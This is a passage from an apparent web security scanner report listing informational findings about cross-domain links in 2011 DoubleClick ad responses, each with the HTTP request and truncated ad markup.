Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 554
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:36:51 GMT
Expires: Tue, 26 Apr 2011 18:36:51 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/4/0/%2a/r;
...[SNIP]...
0/60;39772116/39789903/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LGETSBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/TR_LogoTextPO_No_120x60_ETS.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.15. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=805437803&PG=INV4QC&ASID=ffd2abd4093544b9a0ee74b8349ad9b0&destination=;ord=805437803? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:36:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/4/0/%2a/s;
...[SNIP]...
0/60;39925600/39943387/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_tradefree_60_120x60_wlegal.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.16. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5468
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:41:26 GMT
Expires: Tue, 26 Apr 2011 18:41:26 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 19:54:08 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/7/0/%2a/s%3B239265386%3B0-0%3B0%3B60069804%3B4307-300/250%3B39864914/39882701/3%3B%3B%7Esscs%3D%3fhttp://www.MINIUSA.com"><img src="http://s0.2mdn.net/1885707/1-MINI-1824_big-countryman_300x250_def_1012180800_ff.JPG" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://amch.questionmarket.com/adscgen/st.php?survey_num=851211&site=60069804&code=39864914&randnum=6031698"></script>
...[SNIP]...

19.17. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=170000936&PG=INVPFO&ASID=aa5c7a3756ac4af8a29da842c2cd5fd1&destination=;ord=170000936? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:45:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sat Feb 12 01:28:37 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=170000936&PG=INVPFO&ASID=aa5c7a3756ac4af8a29da842c2cd5fd1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c0/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/scroll_f?cid=bn_msn_f_cs_mc_ScrFr_pk_954x60&priorityCode=4653900000"><img src="http://s0.2mdn.net/1986897/TT_GPSCORE_Scroll_FREE_N_954x60.jpg" width="954" height="60" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40453887&c5=62431291&c6=&"></script>
...[SNIP]...

19.18. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6448
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:39:22 GMT
Expires: Tue, 26 Apr 2011 18:39:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 28 16:36:41 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c1/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid=bn_msn_f_cs_mc_JbmFr_pk_954x60&priorityCode=4653900000"><img src="http://s0.2mdn.net/1986897/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg" width="954" height="60" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=&"></script>
...[SNIP]...

19.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37343
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:40:37 GMT
Expires: Tue, 26 Apr 2011 18:40:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
<NOSCRIPT>
<A TARGET="_blank" HREF="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/activity;src%3D2587595%3Bmet%3D1%3Bv%3D1%3Bpid%3D60965164%3Baid%3D238055498%3Bko%3D0%3Bcid%3D41093370%3Brid%3D41111157%3Brv%3D2%3Bcs%3Da%3Beid1%3D511459%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/g%3B238055498%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093370/41111157/2%3B%3B%7Esscs%3D%3fhttp://www.jeep.com/mktcode/index.html?bid=5302320&pid=60965164&adid=238055498&rid=41111157&app=priceequip&family=2011compass&channel=display">
<IMG SRC="http://s0.2mdn.net/2587595/PID_1583669_Compass_300x250.jpg" width="300" height="250" BORDER="0" alt="">
</A>
...[SNIP]...

19.20. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1111164958&PG=INVTXB&ASID=b42385fc452a4d00b9b8c76f3f09cf8d&destination=;ord=1111164958? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:45:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37054

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
document.write('<A TARGET="_blank" HREF="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1111164958&PG=INVTXB&ASID=b42385fc452a4d00b9b8c76f3f09cf8d&destination=http://ad.doubleclick.net/activity;src%3D1986897%3Bmet%3D1%3Bv%3D1%3Bpid%3D60113228%3Baid%3D236470471%3Bko%3D0%3Bcid%3D41668203%3Brid%3D41685990%3Brv%3D1%3Bcs%3Df%3Beid1%3D497958%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c1/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3fhttp://turbotax.intuit.com/?cid=bn_msn_f_tcb_oninttbnr_CUSct_pk_1x1&priorityCode=4653900000"><IMG SRC="http://s0.2mdn.net/1986897/PID_1588842_300x600.jpg" width="300" height="600" BORDER=0 alt=""></A>
...[SNIP]...

19.21. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:39:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37054

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
document.write('<A TARGET="_blank" HREF="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/activity;src%3D1986897%3Bmet%3D1%3Bv%3D1%3Bpid%3D60113228%3Baid%3D236470471%3Bko%3D0%3Bcid%3D41668203%3Brid%3D41685990%3Brv%3D1%3Bcs%3Df%3Beid1%3D497958%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c1/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3fhttp://turbotax.intuit.com/?cid=bn_msn_f_tcb_oninttbnr_CUSct_pk_1x1&priorityCode=4653900000"><IMG SRC="http://s0.2mdn.net/1986897/PID_1588842_300x600.jpg" width="300" height="600" BORDER=0 alt=""></A>
...[SNIP]...

19.22. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932673890&PG=INVTXT&ASID=9863cbc8ae594fa0a425111baaf2b924&destination=;ord=1932673890? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:45:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36859

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
document.write('<A TARGET="_blank" HREF="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932673890&PG=INVTXT&ASID=9863cbc8ae594fa0a425111baaf2b924&destination=http://ad.doubleclick.net/activity;src%3D1986897%3Bmet%3D1%3Bv%3D1%3Bpid%3D62436413%3Baid%3D239602042%3Bko%3D0%3Bcid%3D41452996%3Brid%3D41470783%3Brv%3D1%3Bcs%3Dc%3Beid1%3D497958%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c0/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs%3D%3fhttps://ttlc.intuit.com/?cid=bn_lc_f_sm_CUSconcept2_pk_300x250&priorityCode=4655200000&rmode=ad"><IMG SRC="http://s0.2mdn.net/1986897/PID_1577306_CommScrolling.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

19.23. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36863
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:39:22 GMT
Expires: Tue, 26 Apr 2011 18:39:22 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
document.write('<A TARGET="_blank" HREF="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/activity;src%3D1986897%3Bmet%3D1%3Bv%3D1%3Bpid%3D62436413%3Baid%3D239602042%3Bko%3D0%3Bcid%3D41450394%3Brid%3D41468181%3Brv%3D1%3Bcs%3Db%3Beid1%3D497958%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/c0/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/250%3B41450394/41468181/1%3B%3B%7Esscs%3D%3fhttps://ttlc.intuit.com/?cid=bn_lc_f_sm_CUSconcept1_pk_300x250&priorityCode=4655200000&rmode=ad"><IMG SRC="http://s0.2mdn.net/1986897/PID_1577234_Trending_Topics.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

19.24. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adi/ads.idg.co.uk/cw-welcome

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 36924
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 21:49:38 GMT
Expires: Tue, 26 Apr 2011 21:49:38 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
.hp.com/us/en/solutions/solutions-detail.html?compURI=tcm:245-300983&pageTitle=&jumpid=ex_r11574_link/1Q11/EBInstantEnterprise/US/dm:_N5823.IDGNetwork_60630073_238162112_41115363">
<IMG SRC="http://s0.2mdn.net/2964851/PID_1559892_backupImage.jpg" width="640" height="480" BORDER="0" alt="">
</A>
...[SNIP]...

19.25. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 21:49:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 342

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3af5/0/0/%2a/l;240259216;0-0;0;50681858;4307-300/250;41814983/41832770/1;;~sscs=%3fhttp://www.computerworlduk.com/solution-centre/google-apps-for-business"><img src="http://s0.2mdn.net/viewad/3079224/mpu.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.26. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/new.computerworlduk.com/security1;dcopt=ist;;kw=news,NULL,NULL,;sz=468x60,728x90;tile=1;ord=1303854538291? HTTP/1.1
